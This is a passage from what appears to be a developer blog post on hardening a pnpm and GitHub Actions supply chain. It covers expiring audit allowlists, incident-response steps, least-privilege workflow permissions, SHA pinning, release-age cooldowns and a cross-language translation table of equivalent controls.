  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real:&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;
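&lt;p&gt;The gate itself is a few lines. A sketch in TypeScript; the entry values are hypothetical, and a real gate would read &lt;code&gt;audit-allowlist.json&lt;/code&gt; from disk and exit non-zero on any hit:&lt;/p&gt;

```typescript
// CI gate sketch: an allowlist entry past its "expires" date fails the build,
// forcing a re-decision instead of silent drift. Entry shape follows the
// schema above (only the fields the gate needs are typed here).
interface AllowlistEntry {
  ghsa: string;
  expires: string; // YYYY-MM-DD
}

export function expiredEntries(
  entries: AllowlistEntry[],
  today: Date
): string[] {
  return entries
    .filter((e) => new Date(e.expires).getTime() < today.getTime())
    .map((e) => e.ghsa);
}

// In CI: read audit-allowlist.json, then
//   if (expired.length > 0) { console.error(...); process.exit(1); }
const entries: AllowlistEntry[] = [
  { ghsa: "GHSA-aaaa-bbbb-cccc", expires: "2024-01-01" }, // hypothetical, lapsed
  { ghsa: "GHSA-dddd-eeee-ffff", expires: "2099-01-01" },
];
console.log(expiredEntries(entries, new Date("2025-06-01")));
```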




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking: at some point two different engineers had each reached for the keyboard to make those scans non-fatal. Removed both bypasses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;
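&lt;p&gt;The Day 1 changes reduce to a few lines of YAML. A minimal sketch (the SHA is a placeholder, not a real pin; resolve it with &lt;code&gt;pinact run&lt;/code&gt;):&lt;/p&gt;

```yaml
# Boundary 8: workflow-level default-deny; each job grants only what it needs.
permissions: {}

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read   # least privilege: this job only checks out code
    steps:
      # Boundary 7: pin to a content-addressed SHA; keep the tag as a comment
      # so pinact/Renovate can still track upgrades.
      - uses: actions/checkout@<full-40-char-sha> # v5
```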

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real, and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, and is audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;On Day 4, the advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt;, both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;, the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;
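&lt;p&gt;The expiry mechanic is small enough to sketch. Assuming a simplified line-oriented allowlist (&lt;code&gt;id expiry rationale&lt;/code&gt; per line; the real &lt;code&gt;audit-allowlist.json&lt;/code&gt; is JSON, but the forcing function is identical):&lt;/p&gt;

```shell
# Demo allowlist: one live entry, one past its expiry.
cat > /tmp/allowlist.txt <<'EOF'
GHSA-r5fr-rjxr-66jc 2099-01-01 lodash _.template unreachable per grep audit
GHSA-demo-0000 2020-01-01 demo entry past its expiry
EOF

today=$(date -u +%Y-%m-%d)
expired=0
while read -r id expires rationale; do
  # ISO dates compare correctly as plain strings.
  if [[ "$expires" < "$today" ]]; then
    echo "EXPIRED: $id -- renew with fresh rationale or fix the finding"
    expired=$((expired + 1))
  fi
done < /tmp/allowlist.txt
echo "expired_entries=$expired"   # CI exits non-zero when this is > 0
```

&lt;p&gt;In CI, a non-zero count becomes a failed required status check, which is what turns a silent ignore into a forced re-decision.&lt;/p&gt;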

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: every right primitive was already in place (Wiz, SonarCloud, Renovate, gitleaks, custom rules), yet none of them was blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required status checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement; we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both assumptions fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider whose valid signed commits pass every Phase 1 control. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;
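&lt;p&gt;The first pattern's review surface fits in a few lines of CODEOWNERS. A sketch (team names hypothetical):&lt;/p&gt;

```text
# CODEOWNERS: every supply-chain surface gets a required human reviewer
/.github/workflows/       @acme/platform-security
**/Dockerfile             @acme/platform-security
pnpm-lock.yaml            @acme/platform-security
**/package.json           @acme/platform-security
audit-allowlist.json      @acme/platform-security
```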

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half: you eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
